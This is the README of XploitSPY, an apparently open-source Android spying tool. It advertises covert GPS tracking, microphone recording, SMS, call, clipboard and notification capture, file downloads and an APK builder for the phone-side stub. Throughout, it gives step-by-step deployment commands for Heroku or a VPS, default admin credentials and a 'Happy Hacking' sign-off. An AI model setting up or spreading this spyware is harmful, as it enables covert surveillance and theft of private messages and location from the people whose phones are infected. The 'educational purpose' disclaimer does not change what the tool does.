A cloud based Android Spying or Monitoring Tool, powered by NodeJS
NOTE: Read all steps carefully to setup XploitSPY as we keep changing them as per need
- GPS Logging
- Microphone Recording
- View Contacts
- SMS Logs
- Send SMS
- Call Logs
- View Installed Apps
- View Stub Permissions
- Live Clipboard Logging
- Live Notification Logging (WhatsApp, Facebook, Instagram, Gmail and more ....)
- View WiFi Networks (logs previously seen)
- File Explorer & Downloader
- Command Queuing
- Built In APK Builder
- Java Runtime Environment 9+
- See installation for OS specifics
- NodeJs
- A Server
Installation on Heroku
Video Tutorial for Heroku Click Here
Create a Account on Heroku
Create New App
in Heroku Dashboard -
Enter App Name and click on create app
Now install Heroku CLI on your Computer Instuctions
Now open your terminal and run command
git clone https://github.com/XploitWizer/XploitSPY
It will download Latest codes for you in your PC
Now change the directory to XploitSPY using command
cd XploitSPY
Now Login into Heroku CLI using command
heroku login -i
now enter your login details and hit Enter -
After Login run this command in terminal
heroku git:remote -a appName
here appName will be your app's name that you choose while creating the app. -
Now run follow commands in termial to install packages
heroku buildpacks:add heroku/jvm
then run
heroku buildpacks:add heroku/nodejs
- Now run this command in your terminal
git push heroku master
, if updating existing app or face any error run this commandgit push -f heroku master
1 - All done now it will take time to complete, after that you can visit your domain shown in terminal.
Installation on VPS or Server
Video Tutorial for VPS or Server Click Here
Connect to your server via SSH
Install JRE 9+
- Debian, Ubuntu, Etc
sudo apt install openjdk-11-jre-headless
- Fedora, Oracle, Red Hat, etc
sudo yum install java-11-openjdk-devel"
- Windows
- click HERE for downloads
- Debian, Ubuntu, Etc
Install NodeJS Instructions Here (If you can't figure this out, you shouldn't really be using this)
install PM2
sudo npm install pm2 -g
Clone this repository
git clone https://github.com/XploitWizer/XploitSPY.git
Now change to the server directory and run these commands
npm install
<- install dependenciessudo pm2 start index.js
<-- start the scriptsudo pm2 startup
<- to run XploitSPY on startup
Default Username : admin & Default Password : password
In your browser navigate to
http://<SERVER IP or URL>
NOTE : XploitSPY now works only on port 80 for both web and client
It's recommended to run XploitSPY behind a reverse proxy such as NGINX
Happy Hacking
XploitWizer Provides no warranty with this software and will not be responsible for any direct or indirect damage caused due to the usage of this tool.
XploitSPY is built for Educational Purpose. Use at your own Risk.
Made with
Credits to D3VL for the original code base this repository is based on at L3MON